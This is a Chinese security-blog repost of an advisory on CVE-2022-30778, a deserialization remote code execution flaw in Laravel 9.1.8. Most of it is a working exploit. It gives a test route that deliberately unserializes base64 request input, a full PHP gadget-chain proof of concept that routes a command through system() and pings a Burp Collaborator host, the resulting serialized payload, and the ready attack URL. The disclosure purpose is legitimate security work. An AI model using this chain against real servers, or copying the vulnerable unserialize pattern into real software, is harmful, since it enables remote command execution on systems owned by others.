【未知】Laravel 9.1.8 反序列化和远程代码执行

admin
admin
admin
102224
文章
87
评论
2022年5月16日20:16:11评论179 views字数 2763阅读9分12秒阅读模式

点击上方蓝字“Ots安全”一起玩耍

×


01
 漏洞描述


Laravel 9.1.8 在处理攻击者控制的反序列化数据时,允许通过 IlluminateBroadcastingPendingBroadcast.php 中的 __destruct 中的反序列化弹出链和 IlluminateBusQueueingDispatcher.php 中的 dispatch($command) 执行远程代码。


×


02
漏洞状态

# 漏洞状态 描述
1 漏洞细节
2 漏洞类型 代码执行
3 漏洞等级 未知
4 野外利用 未知
5 EXP 未知
6 POC
7 CVE编号 CVE-2022-30778


×


03
漏洞引用


  • https://github.com/1nhann/vulns/issues/1



×


04
旧的漏洞



×


05
影响版本


  • Laravel 9.1.8


×


06
漏洞分析


建立一条测试路线:

routes/web.php:

<?php
use IlluminateSupportFacadesRoute;
/*|--------------------------------------------------------------------------| Web Routes|--------------------------------------------------------------------------|| Here is where you can register web routes for your application. These| routes are loaded by the RouteServiceProvider within a group which| contains the "web" middleware group. Now create something great!|*/
Route::get('/', function (IlluminateHttpRequest $request) {//    return view('welcome');    $ser = base64_decode($request->input("ser"));    unserialize($ser);    return "ok";});

poc

<?phpnamespace IlluminateContractsQueue{    interface ShouldQueue    {        //    }}
namespace IlluminateBus{    class Dispatcher{        protected $container;        protected $pipeline;        protected $pipes = [];        protected $handlers = [];        protected $queueResolver;        function __construct(){            $this->queueResolver = "system";
        }    }}
namespace IlluminateBroadcasting{
    use IlluminateContractsQueueShouldQueue;
    class BroadcastEvent implements ShouldQueue {        function __construct(){
        }    }    class PendingBroadcast{        protected $events;        protected $event;        function __construct(){            $this->event = new BroadcastEvent();            $this->event->connection = "ping -nc 1 laravel.me40p9vxwjbs7may8s6puipge7kx8m.burpcollaborator.net";            $this->events = new IlluminateBusDispatcher();        }    }}namespace{    $a = new IlluminateBroadcastingPendingBroadcast();    echo base64_encode(serialize($a));}

结果 :

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo3MDoicGluZyAtbmMgMSBsYXJhdmVsLm1lNDBwOXZ4d2piczdtYXk4czZwdWlwZ2U3a3g4bS5idXJwY29sbGFib3JhdG9yLm5ldCI7fX0=

攻击

http://127.0.0.1:1080/?ser=Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo3MDoicGluZyAtbmMgMSBsYXJhdmVsLm1lNDBwOXZ4d2piczdtYXk4czZwdWlwZ2U3a3g4bS5idXJwY29sbGFib3JhdG9yLm5ldCI7fX0=

【未知】Laravel 9.1.8 反序列化和远程代码执行

【未知】Laravel 9.1.8 反序列化和远程代码执行

原文始发于微信公众号(Ots安全):【未知】Laravel 9.1.8 反序列化和远程代码执行

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月16日20:16:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【未知】Laravel 9.1.8 反序列化和远程代码执行http://cn-sec.com/archives/1011867.html

发表评论

匿名网友 填写信息